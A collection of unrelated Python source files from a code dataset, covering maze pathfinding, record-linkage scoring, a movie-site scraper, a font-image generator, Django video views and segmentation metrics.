self._nColumns, self._matrix, [11, 12, 13, 14], self._startPoint, self._endPoint)\n    def continueSolve(self):\n        if self._s.canWork():\n            self._matrix = self._s.getMatrix()\n            self.showMatrix()\n            return True\n        return False\n    def makeItLikeBeforeLee(self):\n        # different from initializeMatrix because it keeps the painted walls and erases the path, distances and enqueued tiles\n        self._startPoint = self._endPoint = 0\n        for i in range(self._nRows):\n            for j in range(self._nColumns):\n                if self._matrix[i][j] < 10:\n                    self._matrix[i][j] = 10 + r(1, 4)\n        self.borderMatrix()\n    def minPath(self):\n        # v is the queue used while solving, returned as a vector of tuples (actualPosition, parentPosition, discoveryTime)\n        # parentPosition is used to find the path faster than in O(n^2)\n        # discoveryTime is just for coloring\n        distMatrix = [0] * self._nRows\n        for i in range(self._nRows):\n            distMatrix[i] = [-1] * self._nColumns\n        if self._s.isThereAPath:\n            self.makeItLikeBeforeLee()\n            v = self._s.getVector()\n            i = -1\n            while v[i][1] != -1:\n                self._matrix[v[i][0][0]][v[i][0][1]] = 0\n                distMatrix[v[i][0][0]][v[i][0][1]] = v[i][2]\n                i = v[i][1]\n            self._matrix[v[-1][0][0]][v[-1][0][1]] = 40\n            self._matrix[v[0][0][0]][v[0][0][1]] = 30\n            self._s.setDistMatrix(distMatrix)\n        else:\n            
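# Lee/BFS never reached the treasure tile, so there is no path to reconstruct\n            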
print(\"There is no path from ship to the treasure\")\n def saveMatrix(self):\n # just saving the matrix in secondary memory, also nothing fancy\n with open(\"map.txt\", \"w\") as g:\n for i in range(self._nRows):\n for j in range(self._nColumns):\n if self._matrix[i][j] < 10:\n g.write(f\"{10 + r(1, 4)} \")\n else:\n g.write(f\"{self._matrix[i][j]} \")\n g.write(\"\\n\")\n print(\"Matricea a fost salvata\")\n def getMatrixFromFile(self):\n # just reading the matrix from map.txt then show it, nothing fancy\n self.initializeMatrix()\n self._startPoint = self._endPoint = 0\n try:\n f = open(\"map.txt\", \"r\")\n for i in range(self._nRows):\n self._matrix[i] = list(map(int, f.readline().split()))\n for j in range(len(self._matrix[i])):\n if self._matrix[i][j] == 30: # the ship\n self._startPoint = (i, j)\n elif self._matrix[i][j] == 40: # the treasure\n self._endPoint = (i, j)\n print(self._startPoint, self._endPoint)\n self.showMatrix()\n f.close()\n except:\n print(\"File not found!\")\n def getColor(self, n): # Calculate the color for visual distance\n r = 255\n g = 255 - 2 * n\n b = 0\n if g < 0:\n g = 0\n b = (-g) % 256\n return (r, g, b)","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":9860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"226372689","text":"import json\nimport emailGenMethods\nfrom CacheMethods.combineAllCaches import combineAllCaches\nfrom CacheMethods.makeIMDBCache import makeIMDBCache\n\n# with open('./Caches/PopularMovies.json', 'r') as f:\n# origDict = json.load(f)\n# print(len(origDict))\n# print(xxx)\n\nwith open('../newBmetric/movies.json', 'r') as f:\n movies = json.load(f)\n\nwith open('../IMDBCache.json', 'r') as cache:\n linkDict = json.load(cache)\n\nfullPseudoFilmography = [(movies[a]['title'], 'https://www.imdb.com/title/tt' + '0'*(7 - len(a)) + a + '/') for a in movies][100:200]\npseudoFilmography = [a for a in fullPseudoFilmography if a[1] not in linkDict or 'rottentomatoes' not in ''.join(linkDict[a[1]])]\nprint(len(pseudoFilmography))\n\nemailDict = emailGenMethods.getEmailDict(pseudoFilmography)\n\ntry:\n with open('../Caches/PopularMovies.json', 'r') as f:\n origDict = json.load(f)\nexcept:\n origDict = dict()\norigDict.update(emailDict)\nemailDict = origDict.copy()\n\nwith open('../Caches/PopularMovies.json', 'w') as f:\n json.dump(emailDict, f)\n\ncombineAllCaches('../Caches/', '../FilmCache.json')\nmakeIMDBCache('../FilmCache.json')\n\nwith open('../RTPopularLog.html','w') as logFile:\n logFile.write('\\n')\n emailGenMethods.splitFilms(logFile, 'NONE', pseudoFilmography)\n logFile.write('')","sub_path":"CacheMethods/addPopularToCache.py","file_name":"addPopularToCache.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"100510463","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\n## IMPORTANT: FOLDER STRUCTURE ##\r\nBelow mentioned folder structure must be followed for getting the results from this script:\r\n01. Script must be placed into a folder known as main folder\r\n02. Source files (3 lists) must be placed into the Source folder under main folder\r\n03. a folder named as IntermediateFiles must be created under main folder with below mentioned sub-folders\r\n A. Source\r\n B. Preprocessed\r\n C. IntermediateFiles\r\n i. DDM\r\n ii. PDM\r\n\r\n## IMPORTANT: EXECUTION ORDER ##\r\nBelow scripts must be exected in the mentioned order:\r\n01. 01_RecordLinkageDDM.py\r\n02. 02_RecordLinkagePDM.py\r\n03. 03_RecordLinkageDDMScore.py\r\n04. 04_RecordLinkagePDMScore.py\r\n\r\nThis script generates record based score in case of a match between customer list and negative/positive lists. It performs below mentioned steps:\r\n01. Reads data from the files generated after DDM completion\r\n02. generates record based score corresponding to all the DDM records\r\n03. Generates files under DDM folder present under IntermediateFiles folder\r\n\r\n\"\"\"\r\n\r\n# Load required packages\r\nimport os\r\nimport pandas as pd\r\nimport recordlinkage\r\nfrom datetime import datetime\r\nimport numpy as np\r\nfrom difflib import SequenceMatcher\r\nimport math\r\n\r\n\r\ndef extractSource(dir, files):\r\n '''\r\n Function to extract Data from files in a specific format\r\n '''\r\n t = {\"FIRST_NAME\": object, \"LAST_NAME\": object, \"DOB\": object, \"STREET\": object,\"ZIP\": object, \"CITY\": object, \"HNRNEW\": object}\r\n files = datetime.now().strftime(\"%Y%m%d\") + \"_\" + files\r\n filename = dir + files\r\n df = pd.read_csv(filename, index_col=\"ID\", na_values=\"0000-00-00\", dtype=t)\r\n return df\r\n\r\ndef similar(a, b):\r\n '''\r\n Function to generate similarity score between two strings (a, b)\r\n '''\r\n return SequenceMatcher(None, a, b).ratio()\r\n\r\ndef scorePOS(rec, df_cust, df_pos):\r\n '''\r\n Function to assign weights to each column, generate similarity score corresponding to each value in the matched rows and come up with overall match score for the matched records between customer and positive lists\r\n '''\r\n W = {\"FIRST_NAME\": 19, \"LAST_NAME\": 25, \"DOB\": 28, \"STREET\": 11,\"ZIP\": 6, \"CITY\": 8, \"HNRNEW\": 3}\r\n cust_rec = df_cust.loc[rec['ID_CUST']]\r\n pos_rec = df_pos.loc[rec['ID_POS']]\r\n df = pd.DataFrame()\r\n null_col = (cust_rec[cust_rec.isna()].index | pos_rec[pos_rec.isna()].index).tolist()\r\n R = 0.0\r\n for k in W.keys():\r\n if k in null_col:\r\n R += W[k]\r\n W[k] = 0\r\n D = {}\r\n for k in W.keys():\r\n W[k] = W[k] * 100 / (100 - R)\r\n if k in null_col:\r\n D[k] = 0.0\r\n else:\r\n if (k == 'DOB'):\r\n if (similar(cust_rec[k], pos_rec[k]) < 1):\r\n D[k] = 0\r\n else:\r\n D[k] = 1\r\n else:\r\n D[k] = similar(cust_rec[k], pos_rec[k])\r\n W = pd.Series(W, name = 'W') \r\n D = pd.Series(D, name = 'D')\r\n df = pd.concat([D, W], axis=1)\r\n df['S'] = df['D'] * df['W']\r\n return df['S'].sum()\r\n\r\ndef scoreNEG(rec, df_cust, df_neg):\r\n '''\r\n Function to assign weights to each column, generate similarity score corresponding to each value between matched rows and come up with overall match score for the matched records between customer and negative lists\r\n '''\r\n W = {\"FIRST_NAME\": 19, \"LAST_NAME\": 25, \"DOB\": 28, \"STREET\": 11,\"ZIP\": 6, \"CITY\": 8, \"HNRNEW\": 3}\r\n cust_rec = df_cust.loc[rec['ID_CUST']]\r\n neg_rec = df_neg.loc[rec['ID_NEG']]\r\n 
df = pd.DataFrame()\r\n null_col = (cust_rec[cust_rec.isna()].index | neg_rec[neg_rec.isna()].index).tolist()\r\n R = 0.0\r\n for k in W.keys():\r\n if k in null_col:\r\n R += W[k]\r\n W[k] = 0\r\n D = {}\r\n for k in W.keys():\r\n W[k] = W[k] * 100 / (100 - R)\r\n if k in null_col:\r\n D[k] = 0.0\r\n else:\r\n if (k == 'DOB'):\r\n if (similar(cust_rec[k], neg_rec[k]) < 1):\r\n D[k] = 0\r\n else:\r\n D[k] = 1\r\n else:\r\n D[k] = similar(cust_rec[k], neg_rec[k])\r\n W = pd.Series(W, name = 'W') \r\n D = pd.Series(D, name = 'D')\r\n df = pd.concat([D, W], axis=1)\r\n df['S'] = df['D'] * df['W']\r\n return df['S'].sum()\r\n\r\ndef MatchScore(ddm, cust, pos, neg):\r\n '''\r\n Function to identify the matched rows and call the appropriate function to get row based score\r\n '''\r\n d = {}\r\n for i in range(len(ddm)):\r\n rec = ddm.iloc[i]\r\n if pd.isnull(rec['ID_NEG']):\r\n d[i] = scorePOS(rec, cust, pos)\r\n elif pd.isnull(rec['ID_POS']):\r\n d[i] = scoreNEG(rec, cust, neg)\r\n else:\r\n d[i] = 0\r\n ddm['NEW_SCORE'] = ddm.index.to_series().map(d)\r\n return ddm\r\n\r\ndef MatchedFiles(dir, file, df):\r\n '''\r\n Function to create intermediate files post a specific operation like Data Preprocessing without index values\r\n '''\r\n originalFiles = [\"00_List_Customer_Monitoring.csv\", \"01a_List_Negative.csv\", \"01b_List_Positive.csv\"]\r\n if file in originalFiles:\r\n file = file\r\n else:\r\n file = datetime.now().strftime(\"%Y%m%d\") + \"_\" + file\r\n filename = dir + file\r\n df.to_csv(filename, index=False)\r\n\r\n# Main function - starting point of the script\r\nif __name__ == \"__main__\":\r\n print(\"Data Load started: \" + str(datetime.now()))\r\n cwd = os.getcwd()\r\n intFileDir = cwd + r\"\\\\IntermediateFiles\\\\Preprocessed\\\\\"\r\n print(\"CUSTOMER MONITORING LIST\")\r\n custFile = r\"PP_00_List_Customer_Monitoring.csv\"\r\n df_cust = extractSource(intFileDir, custFile)\r\n print(\"NEGATIVE LIST\")\r\n negFile = r\"PP_01a_List_Negative.csv\"\r\n df_neg = extractSource(intFileDir, negFile)\r\n print(\"POSITIVE LIST\")\r\n posFile = r\"PP_01b_List_Positive.csv\"\r\n df_pos = extractSource(intFileDir, posFile)\r\n print(\"Data Load Completed!!! \" + str(datetime.now()))\r\n intFileDir = cwd + r\"\\\\IntermediateFiles\\\\DDM\\\\\"\r\n ddmFile = intFileDir + datetime.now().strftime(\"%Y%m%d\") + '_' + r'DDM.csv'\r\n df_ddm = pd.read_csv(ddmFile)\r\n df_ddm1 = df_ddm.copy()\r\n df_ddm1 = MatchScore(df_ddm1, df_cust, df_pos, df_neg)\r\n ddmFile1 = r'DDM1.csv'\r\n MatchedFiles(intFileDir, ddmFile1, df_ddm1)","sub_path":"03_RecordLinkageDDMScore.py","file_name":"03_RecordLinkageDDMScore.py","file_ext":"py","file_size_in_byte":6324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"71690099","text":"from datetime import datetime, timedelta, date\nfrom collections import Counter\nfrom wordcloud import WordCloud\nimport fasttext\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom config import MiningConfig\n\n\ndef extract_case_study_texts(start, end, img_name):\n print('loading models ...')\n model_rel = fasttext.load_model(MiningConfig.slo_case_study_relevance_model_path)\n model_cate_social = fasttext.load_model(MiningConfig.slo_case_study_category_model_path % 'social')\n model_cate_economic = fasttext.load_model(MiningConfig.slo_case_study_category_model_path % 'economic')\n model_cate_environmental = fasttext.load_model(MiningConfig.slo_case_study_category_model_path % 'environmental')\n model_cate_other = fasttext.load_model(MiningConfig.slo_case_study_category_model_path % 'other')\n model_stance = fasttext.load_model(MiningConfig.slo_case_study_stance_model_path)\n print('done.')\n\n f = open(MiningConfig.slo_text_series_path)\n lines = f.readlines()\n\n all_text = []\n all_category = []\n all_stance = []\n\n for line in lines:\n timestamp, company, text = line.strip().split('\\t')\n\n rel = model_rel.predict(text)[0][0]\n social = model_cate_social.predict(text)[0][0]\n economic = model_cate_economic.predict(text)[0][0]\n environmental = model_cate_environmental.predict(text)[0][0]\n other = model_cate_other.predict(text)[0][0]\n stance = model_stance.predict(text)[0][0]\n\n # if rel == '__label__irrelevance':\n # continue\n\n try:\n _date = (datetime(1970, 1, 1) + timedelta(milliseconds=int(timestamp))).date()\n except ValueError:\n _date = datetime.strptime(timestamp.split('T')[0], '%Y-%m-%d').date()\n\n text = text.replace('bhp', '')\n text = text.replace('billiton', '')\n text = text.replace('URL', '')\n text = text.replace('via', '')\n\n if start <= _date <= end:\n all_text.append(text)\n\n if social != '__label__none':\n all_category.append(social)\n if economic != '__label__none':\n all_category.append(economic)\n if environmental != '__label__none':\n all_category.append(environmental)\n if other != '__label__none':\n all_category.append(other)\n all_stance.append(stance)\n\n print(Counter(all_category))\n print(Counter(all_stance))\n print(len(all_text))\n\n wordcloud = WordCloud().generate(' '.join(all_text))\n\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.tight_layout()\n plt.axis(\"off\")\n plt.savefig(img_name, dpi=600)\n plt.show()\n\n\ndef draw_full_time_series():\n df = pd.read_csv(MiningConfig.slo_time_series_company_csv_path, index_col=0)\n print(df)\n for col in df.columns:\n df[col] = df[col].ewm(alpha=0.025).mean()\n ax = df.plot(legend=True, grid=False, figsize=(8, 5), fontsize=16)\n for i, line in enumerate(ax.lines):\n if i == len(ax.lines) - 1:\n line.set_linewidth(4)\n line.set_color('black')\n line.set_linestyle('-')\n else:\n line.set_linewidth(2)\n line.set_linestyle('-')\n\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(handles=handles, labels=labels, fontsize=12, loc='upper left', bbox_to_anchor=(1.01, 1))\n labels = [item.get_text() for item in ax.get_xticklabels()]\n labels[1] = '2016'\n labels[2] = '2017'\n labels[3] = '2018'\n labels[4] = '2019'\n labels[5] = '2020'\n ax.set_xlabel('')\n ax.set_ylabel('EWMA', fontsize=20)\n ax.set_xticklabels(labels, rotation=45, fontsize=16)\n _, _, ymin, ymax = ax.axis()\n # print([a for a in ax.get_xticks()])\n ax.vlines(105, ymin=ymin, ymax=ymax, linestyles='--', color='grey', linewidth=2)\n ax.grid(b=True, which='major', 
axis='y', color='grey', linestyle='--', alpha=1)\n plt.tight_layout()\n plt.show()\n\n\ndef draw_bhp_time_series():\n df = pd.read_csv(MiningConfig.slo_time_series_bhp_csv_path)\n\n for col in df.columns:\n if col != 'company' and col != 'date':\n df[col] = df[col].ewm(alpha=0.05).mean()\n\n df = df.drop(columns=['company'])\n df = df.rename(columns={'mean': 'SLO score',\n 'overallMean': 'Mean',\n 'lower': 'LCL', 'upper': 'UCL'})\n\n df['date'] = pd.to_datetime(df['date'], errors='coerce')\n\n plt.figure(figsize=(6, 6))\n plt.plot_date(df['date'], df['LCL'], '--', color='grey', alpha=0.2)\n plt.plot_date(df['date'], df['UCL'], '--', color='grey', alpha=0.2)\n plt.plot_date(df['date'], df['SLO score'], '-', color='orange', linewidth=2, label='BHP')\n plt.plot_date(df['date'], df['Mean'], '-', color='black', linewidth=4, label='Mean')\n plt.fill_between(df['date'], df['LCL'], df['UCL'],\n where=df['UCL'] >= df['LCL'],\n facecolor='grey', alpha=0.2, interpolate=True)\n plt.xlim((pd.to_datetime('2016-01-01', format='%Y-%m-%d', errors='ignore'),\n pd.to_datetime('2016-06-30', format='%Y-%m-%d', errors='ignore')))\n _, _, ymin, ymax = plt.axis()\n plt.vlines([pd.to_datetime('2016-03-01', format='%Y-%m-%d', errors='ignore')],\n ymin=ymin, ymax=ymax, linestyles='--', color='grey', linewidth=2)\n plt.xticks(rotation=45, fontsize=16)\n plt.yticks(fontsize=16)\n plt.ylabel('EWMA', fontsize=20)\n plt.legend(loc='lower right', fontsize=16)\n plt.tight_layout()\n plt.grid(b=True, which='major', axis='y', color='grey', linestyle='--', alpha=1)\n plt.show()\n\n\nif __name__ == '__main__':\n extract_case_study_texts(date(2016, 1, 1), date(2016, 3, 1),\n MiningConfig.slo_case_study_bhp_mariana_wc_path) # mariana\n extract_case_study_texts(date(2019, 1, 25), date(2019, 2, 25),\n MiningConfig.slo_case_study_bhp_brumadinho_wc_path) # brumadinho\n draw_full_time_series()\n draw_bhp_time_series()\n","sub_path":"experiments/case_study.py","file_name":"case_study.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"402374451","text":"class Solution:\r\n def findLengthOfLCIS(self, nums: List[int]) -> int:\r\n temp_count = 1\r\n max_count = 1\r\n \r\n for i in range(len(nums)-1):\r\n if nums[i] < nums[i+1]:\r\n temp_count += 1\r\n max_count = max(max_count, temp_count)\r\n else:\r\n temp_count = 1\r\n \r\n return max_count\r\n\r\n \r\n\r\n# SIMILAR question: find the length of the longest substring with the repeating letter \r\n\r\n# class Solution:\r\n# def findLengthOfLongestSubstring(self, s): \r\n# cur_count = 1\r\n# max_count = 0\r\n\r\n# for i in range(len(s)-1):\r\n# if s[i] == s[i+1]:\r\n# cur_count += 1\r\n# max_count = max(max_count, cur_count)\r\n# else:\r\n# cur_count = 1\r\n\r\n# return max_count\r\n\r\n \r\n# # s = 'ABBBBBABA'\r\n# # s = '101101111'\r\n \r\n# Time: O(N), where N is the length of nums. We perform one loop through nums.\r\n# Space: O(1), the space used by result and count.\r\n","sub_path":"14 Sliding Window/674. Longest Continuous Increasing Subsequence.py","file_name":"674. Longest Continuous Increasing Subsequence.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"396912995","text":"import requests\nimport re\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/67.0.3396.99 Safari/537.36'}\n\n\ndef get_one_page(url):\n try:\n r = requests.get(url, headers=headers)\n r.raise_for_status()\n return r.text\n except Exception as e:\n print(e)\n return ''\n\n\ndef parse_one_page(html):\n pattern = '.*?index.*?>(.*?)
.*?name.*?a.*?>(.*?).*?star\">(.*?)
.*?releasetime\">(.*?)' \\\n '.*?integer\">(.*?).*?fraction\">(.*?).*?'\n items = re.findall(pattern, html, re.S)\n for item in items:\n index = item[0]\n name = item[1]\n star = item[2].strip()[3:]\n time = item[3].strip()[5:]\n score = item[4] + item[5]\n print(index, name, star, time, score)\n\n\ndef main():\n for i in range(5):\n url = \"http://maoyan.com/board/4?offset=\" + str(i * 10)\n html = get_one_page(url)\n parse_one_page(html)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"猫眼电影/use_re.py","file_name":"use_re.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"225772850","text":"# Image and label files are created in the called directory.\n#\n# ./\n# └ ${font_name}/\n# ├ image/\n# │ ├ ${font_name}_${char}_${asciicode}.png\n# │ ├ ${font_name}_${char}_${asciicode}.png\n# │ └ ${font_name}_${char}_${asciicode}.png\n# ├ ${font_name}-d.txt # data written by 0-256\n# └ ${font_name}-t.txt # label\n#\n# USAGE: ipython font_to_png_and_txt.py FONT_FILE_PATH [WIDTH] [HEIGHT]\n\nimport subprocess as sp\nimport sys\nfrom skimage import io\n\nargs = sys.argv\n\nPATH = args[1]\n\n# decide the image size\nif len(args) == 4:\n WIDTH = args[2]\n HEIGHT = args[3]\nelif len(args) == 3:\n WIDTH = HEIGHT = args[2]\nelse:\n WIDTH = HEIGHT = '64'\n\n\nfont_name = PATH.split(\"/\")[-1].split(\".\")[0]\n\n# characters\n# atoz = [chr(i) for i in range(97,97+26)]\n# AtoZ = [chr(i) for i in range(65,65+26)]\n# num = [chr(i) for i in range(ord('0'),ord('9')+1)]\nAscii = [chr(i) for i in range(32, 127)] \n\n# list = atoz + AtoZ + num\nlist = Ascii\n\n# create save directory\nsp.run([\"mkdir\", \"-p\", font_name+\"/image\"])\n\n# data\nf = open(font_name + '/' + font_name + '-d.txt', 'w')\n# label\ng = open(font_name + '/' + font_name + '-t.txt', 'w')\n\n# create image file\nfor num, c in enumerate(list):\n if c is '/':\n file_name = font_name+str(ord(c))+\"_slash_.png\"\n elif c is '\\\\':\n file_name = font_name+str(ord(c))+\"_back_slash_.png\"\n else:\n file_name = font_name+str(ord(c))+\"_'\"+c+\"'_\"+\".png\"\n\n\n if c is not '\\\\':\n sp.run([\"convert\", \"-font\", PATH, \"-size\", WIDTH+\"x\"+HEIGHT, \"-gravity\", \"Center\", \"label:\"+c, font_name+\"/image/\"+file_name ])\n else:\n sp.run([\"convert\", \"-font\", PATH, \"-size\", WIDTH+\"x\"+HEIGHT, \"-gravity\", \"Center\", \"label:\"+c+c, font_name+\"/image/\"+file_name ])\n\n\n img = io.imread(font_name + \"/image/\" + file_name)\n f.write( ','.join( map(str, img.reshape(-1)) ) )\n f.write('\\n')\n g.write(c+'\\n')\n\n sys.stdout.write(\"\\r{}: [*{}{}]\".format(font_name, \"*\"*num, \"-\"*(len(list)-(num+1))))\n sys.stdout.flush()\n\nf.close()\ng.close()\n\nprint()\n","sub_path":"bin/ascii_font_to_png_and_txt.py","file_name":"ascii_font_to_png_and_txt.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"59172660","text":"def pattern_twelve(strings):\r\n '''Pattern twelve\r\n\r\n U\r\n D U\r\n N D U\r\n A N D U\r\n M A N D U\r\n H M A N D U\r\n T H M A N D U\r\n A T H M A N D U\r\n K A T H M A N D U\r\n '''\r\n\r\n if not str(strings).isalpha():\r\n strings = str(strings) # If provided is integer then converting to string\r\n\r\n for x in range(1, len(strings) + 1):\r\n print(' '.join(strings[-x:]))\r\n\r\n '''Another Way to do the same thing\r\n string = 'KATHMANDU'\r\n\r\n for i in range(len(string) - 1, -1, -1):\r\n print(' '.join(string[i:])) '''\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n pattern_twelve('KATHMANDU')\r\n\r\n except NameError:\r\n print('String or Integer was expected')\r\n","sub_path":"Project Pattern/pattern_12.py","file_name":"pattern_12.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"65088408","text":"# -*- coding: utf-8 -*-\r\n\r\n# 视频管理\r\n\r\nfrom django.db.models import Q\r\nfrom django.http import HttpResponse\r\n\r\nfrom tutils import t_url_tools\r\nfrom video_manager.models import Tag, Video\r\n\r\n\r\n# 获取标签\r\ndef get_tags(json_obj):\r\n tag = int(json_obj['tag'])\r\n if tag < 0:\r\n all_tags = Tag.objects.all()\r\n else:\r\n all_tags = Tag.objects.filter(parent_tag_id=tag)\r\n response_data = []\r\n for item in all_tags:\r\n res_item = {}\r\n res_item['pic_url'] = t_url_tools.get_file_url(item.pic_url)[1]\r\n res_item['title'] = item.title\r\n res_item['desc'] = item.desc\r\n res_item['id'] = item.id\r\n response_data.append(res_item)\r\n s = t_url_tools.get_response_str(response_data) # 获取标签\r\n return s\r\n\r\n\r\n# 通过标签获取视频\r\ndef get_video_by_tag(json_obj):\r\n s = \"[]\"\r\n tag = int(json_obj['tag'])\r\n page = int(json_obj['page'])\r\n rows = int(json_obj['rows'])\r\n\r\n # 在没有manyToMany的表里面\r\n search_tag = Tag.objects.filter(id=tag).first()\r\n if None == search_tag:\r\n return HttpResponse(s)\r\n\r\n all_videos = search_tag.video_set.all()[page:rows + page]\r\n response_data = []\r\n for item in all_videos:\r\n res_item = {'title': item.title}\r\n res_item['pic_url'] = t_url_tools.get_file_url(item.pic_url)[1]\r\n res_item['video_url'] = item.video_url\r\n res_item['desc'] = item.desc\r\n res_item['id'] = item.id\r\n response_data.append(res_item)\r\n return t_url_tools.get_response_str(response_data) # 通过关键字搜索视频\r\n\r\n\r\ndef get_video_by_gjz(json_obj):\r\n gjz = json_obj['gjz']\r\n all_videos = Video.objects.filter(Q(title__contains=gjz) | Q(desc__contains=gjz))\r\n response_data = []\r\n for item in all_videos:\r\n res_item = {'title': item.title}\r\n res_item['pic_url'] = t_url_tools.get_file_url(item.pic_url)[1]\r\n res_item['video_url'] = item.video_url\r\n res_item['desc'] = item.desc\r\n res_item['id'] = item.id\r\n response_data.append(res_item)\r\n s = t_url_tools.get_response_str(response_data)\r\n return s\r\n\r\n\r\n# 排序视频\r\ndef get_videos_order(json_obj):\r\n video_type = int(json_obj['type'])\r\n page = int(json_obj['page'])\r\n rows = int(json_obj['rows'])\r\n all_videos = []\r\n top_video = []\r\n if 1 == video_type: # 最新\r\n all_videos = Video.objects.order_by(\"-upload_time\")[page:rows + page]\r\n elif 2 == video_type: # 最热\r\n all_videos = Video.objects.order_by(\"-play_count\")[page:rows + page]\r\n elif 3 == video_type: # 推荐\r\n all_videos = Video.objects.order_by(\"-recommend\")[page:rows + page]\r\n elif 4 == video_type: # 一个推荐,剩下的按时间\r\n top_video = Video.objects.order_by(\"-recommend\")[:1]\r\n all_videos = Video.objects.filter(~Q(id=top_video.first().id)).order_by(\"-upload_time\")[page:rows + page]\r\n else:\r\n s = t_url_tools.get_response_str({}, success=False, msg=\"查找类型有误\",\r\n err_code=t_url_tools.ERR_CODE_PARM)\r\n return s\r\n\r\n response_data = []\r\n for item in top_video:\r\n res_item = {'title': item.title}\r\n res_item['pic_url'] = t_url_tools.get_file_url(item.pic_url)[1]\r\n res_item['video_url'] = item.video_url\r\n res_item['desc'] = item.desc\r\n res_item['id'] = item.id\r\n response_data.append(res_item)\r\n for item in all_videos:\r\n res_item = {'title': item.title}\r\n res_item['pic_url'] = t_url_tools.get_file_url(item.pic_url)[1]\r\n res_item['video_url'] = item.video_url\r\n res_item['desc'] = item.desc\r\n res_item['id'] = item.id\r\n response_data.append(res_item)\r\n s = t_url_tools.get_response_str(response_data)\r\n return s\r\n\r\n\r\ndef get_video_by_id(json_obj):\r\n vid = 
json_obj['vid']\r\n    all_videos = Video.objects.filter(id=vid)\r\n    if len(all_videos) <= 0:\r\n        s = t_url_tools.get_response_str({}, success=False, msg=\"Video does not exist\", err_code=t_url_tools.ERR_CODE_DATA)\r\n        return s\r\n\r\n    # record the play count\r\n    video_model = all_videos.first()\r\n    res_item = {'title': video_model.title}\r\n    res_item['pic_url'] = t_url_tools.get_file_url(video_model.pic_url)[1]\r\n    res_item['video_url'] = video_model.video_url\r\n    res_item['desc'] = video_model.desc\r\n    res_item['id'] = video_model.id\r\n    s = t_url_tools.get_response_str(res_item)\r\n    return s\r\n","sub_path":"video_manager/logic/video_ctrl.py","file_name":"video_ctrl.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"283083220","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 2 16:45:37 2020\n\n@author: jlazo\n\"\"\"\n\nimport pandas as pd\nimport os.path\nfrom os import path\nfrom PIL import Image\nfrom os import listdir\nfrom os.path import isfile, join\nfrom datetime import datetime\nimport csv\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.patches import Polygon\nimport cv2\nfrom matplotlib import gridspec\n\n\ndef stars(p):\n if p < 0.0001:\n return \"****\"\n elif (p < 0.001):\n return \"***\"\n elif (p < 0.01):\n return \"**\"\n elif (p < 0.05):\n return \"*\"\n else:\n return \"-\"\n\n\ndef get_mcc(groundtruth_list, predicted_list):\n \"\"\"Return mcc covering edge cases\"\"\"\n\n tn, fp, fn, tp = get_confusion_matrix_elements(groundtruth_list, predicted_list)\n\n if _all_class_0_predicted_as_class_0(groundtruth_list, predicted_list) is True:\n mcc = 1\n elif _all_class_1_predicted_as_class_1(groundtruth_list, predicted_list) is True:\n mcc = 1\n elif _all_class_1_predicted_as_class_0(groundtruth_list, predicted_list) is True:\n mcc = -1\n elif _all_class_0_predicted_as_class_1(groundtruth_list, predicted_list) is True:\n mcc = -1\n\n elif _mcc_denominator_zero(tn, fp, fn, tp) is True:\n mcc = -1\n\n # Finally calculate MCC\n else:\n mcc = ((tp * tn) - (fp * fn)) / (\n np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)))\n\n return mcc\n\n\ndef get_confusion_matrix_intersection_mats(groundtruth, predicted):\n \"\"\" Returns dict of 4 boolean numpy arrays with True at TP, FP, FN, TN\n \"\"\"\n\n confusion_matrix_arrs = {}\n\n groundtruth_inverse = np.logical_not(groundtruth)\n predicted_inverse = np.logical_not(predicted)\n\n confusion_matrix_arrs['tp'] = np.logical_and(groundtruth, predicted)\n confusion_matrix_arrs['tn'] = np.logical_and(groundtruth_inverse, predicted_inverse)\n confusion_matrix_arrs['fp'] = np.logical_and(groundtruth_inverse, predicted)\n confusion_matrix_arrs['fn'] = np.logical_and(groundtruth, predicted_inverse)\n\n return confusion_matrix_arrs\n\n\ndef get_confusion_matrix_overlaid_mask(image, groundtruth, predicted, alpha, colors):\n \"\"\"\n Returns overlay the 'image' with a color mask where TP, FP, FN, TN are\n each a color given by the 'colors' dictionary\n \"\"\"\n # image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n masks = get_confusion_matrix_intersection_mats(groundtruth, predicted)\n color_mask = np.zeros_like(image, dtype=np.float32)\n for label, mask in masks.items():\n color = colors[label]\n mask_rgb = np.zeros_like(image, dtype=np.float32)\n # mask_rgb = mask_rgb.astype(int)\n size_x, size_y, channels = np.shape(mask)\n plt.figure()\n plt.title(label)\n plt.imshow(mask.astype(np.float32))\n\n for x_index in range(size_x):\n for y_index in range(size_y):\n if mask[\n x_index, y_index, 0] != 0: # and mask[x_index, y_index, 1] == 0 and mask[x_index, y_index, 2] == 0:\n 